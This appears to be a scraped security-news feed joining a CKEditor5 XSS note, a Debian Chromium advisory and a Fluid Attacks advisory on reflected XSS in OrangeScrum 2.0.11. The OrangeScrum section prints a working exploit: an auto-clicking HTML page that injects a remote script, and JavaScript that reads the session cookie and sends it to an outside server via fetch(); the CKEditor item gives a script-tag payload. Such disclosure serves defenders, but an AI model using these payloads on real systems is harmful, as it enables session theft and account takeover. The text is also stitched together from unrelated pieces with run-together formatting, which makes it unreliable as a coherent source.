athttps://ckeditor.com/docs/ckeditor5/latest/features/html-embed.html#securitySecurity Docs Says """The HTML embed feature does not currently executecode in <script> tags. However, it will execute code in the on* andsrc="javascript:..." attributes."""Payload:<div class="raw-html-embed">    <script>alert(456)</script></div>

CKSource CKEditor5 35.4.0 Cross Site Scripting

Debian Linux Security Advisory 5345-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5345-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 08, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-0696 CVE-2023-0697 CVE-2023-0698 CVE-2023-0699                  CVE-2023-0700 CVE-2023-0701 CVE-2023-0702 CVE-2023-0703                  CVE-2023-0704 CVE-2023-0705Debian Bug     : 1030160Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 110.0.5481.77-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmPj860ACgkQEMKTtsN8TjbsOg//cRkTQIqMAkhFm7uk5KTI++4LVb10YH/VovAhEtgA3Y4pc8bT44b1CD5H2sOgcXY1zxG54hMLxNgy3UjkvjlsFoYTfoYE21G+tISDDfM4/cOHZFPybfdqkDNnCQbbz0DtCK3Row++C3WioTEpIbLpDOPzQiv2tBPQnFMh7xFbzfLFKbb7OTpQRk3ZPX4COl9o1Ys0I6Q4mMwJhCFGJ/eomRs5AYMv4X+NBJIogihK5mJdU5lw1fWTLLCYAFOktNI7ITKOp05HnD70jwhVbmd6rJDYRkvFpZSX9rWH0LVbrDZWSFTnuNN7UTKswZpaFDkCrH4H++HTdIDCItQYMxaZ6V8tbq5/KYKlGSF5tq2XtaDNSqSlppkXg4QFQKyEuVwOu2e1FsXvAxzfNTuexvy4rgp6LOZ+BaZS1yeXfc8zMhFzUYBKYGYVSNVXrI8A1wvbjUBg/jOmVVQydvOOscVNioZbnTkiO3ZsgMsppxabHGAiH8arQWGjw190Bcv8QbEv+C8yL9+aVZUftnZKSIZVs7Y8zPp6W3sE3lzKnizjqUcht8YCh3F1Q/OC2OemLhfsUT4NgfpwtfaeVdZeN4oN595P+VMPUKIiJRnqgKZXuAbBToEE2GCoO3R/er0sACDzJOmaxbhoROBOp3lzNt4iJ6tR3h42SZoMBsUtS2MvJKI==Lc/Z-----END PGP SIGNATURE-----

Debian Security Advisory 5345-1

OrangeScrum version 2.0.11 allows an external attacker to obtain arbitrary user accounts from the application. This is possible because the application returns malicious user input in the response with the content-type set to text/html.

1.  Home
2.  Advisories
3.  OrangeScrum 2.0.11 Reflected XSS via filename

**Summary**

**Name**

OrangeScrum 2.0.11 - Reflected XSS via filename

**Code name**

Oberhofer

**Product**

OrangeScrum

**Affected versions**

2.0.11

**State**

Public

**Release Date**

2023-02-13

**Vulnerability**

**Kind**

Reflected cross-site scripting (XSS)

**Rule**

008\. Reflected cross-site scripting (XSS)

**Remote**

Yes

**CVSSv3 Vector**

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N

**CVSSv3 Base Score**

7.3

**Exploit available**

No

**CVE ID(s)**

CVE-2023-0624

**Description**

OrangeScrum version 2.0.11 allows an external attacker to obtain arbitrary user accounts from the application. This is possible because the application returns malicious user input in the response with the content-type set to text/html.

**Vulnerability**

This vulnerability occurs because the application returns malicious user input in the response with the content-type set to text/html.

**Exploitation**

To exploit this vulnerability, we only need to send the following malicious HTML code to an application user.

**Exploit.html**

    <!DOCTYPE html>
    <html>
        <body>
            <a id="exploit" href="https://retr02332bughunter.orangescrum.com/defect/defects/download?filename=%3Cscript+type=%27text/javascript%27+src=%27https://retr02332.com/exploit-utils.js%27%3E%3C/script%3E"> Exploit</a>
            <script>
                document.getElementById("exploit").click();
            </script>
        </body>
    </html>
    

The malicious JavaScript that we embed in the page is as follows.

**Exploit-utils.js**

    function getCookie(name) {
        const value = `; ${document.cookie}`;
        const parts = value.split(`; ${name}=`);
        if (parts.length === 2) return parts.pop().split(';').shift();
    }
    
    let sessionCookie = `USER_UNIQ=${getCookie("USER_UNIQ")}`;
    
    fetch("https://retr02332.com/leak?"+sessionCookie);
    

Thus, when the user clicks on the malicious link, it will send its session cookie to the attacker's server logs.

**Evidence of exploitation**

POC-XSS-OrangeScrum

**Our security policy**

We have reserved the ID CVE-2023-0624 to refer to this issue from now on.

*   https://fluidattacks.com/advisories/policy/

**System Information**

*   Version: OrangeScrum 2.0.11
    
*   Operating System: GNU/Linux
    

**Mitigation**

There is currently no patch available for this vulnerability.

**Credits**

The vulnerability was discovered by Carlos Bello from Fluid Attacks' Offensive Team.

**References**

**Vendor page** https://github.com/Orangescrum/orangescrum/

**Timeline**

2023-02-07

Vulnerability discovered.

2023-02-07

Vendor contacted.

2023-02-07

Vendor replied acknowledging the report.

2023-02-13

Public Disclosure.

Tag

#linux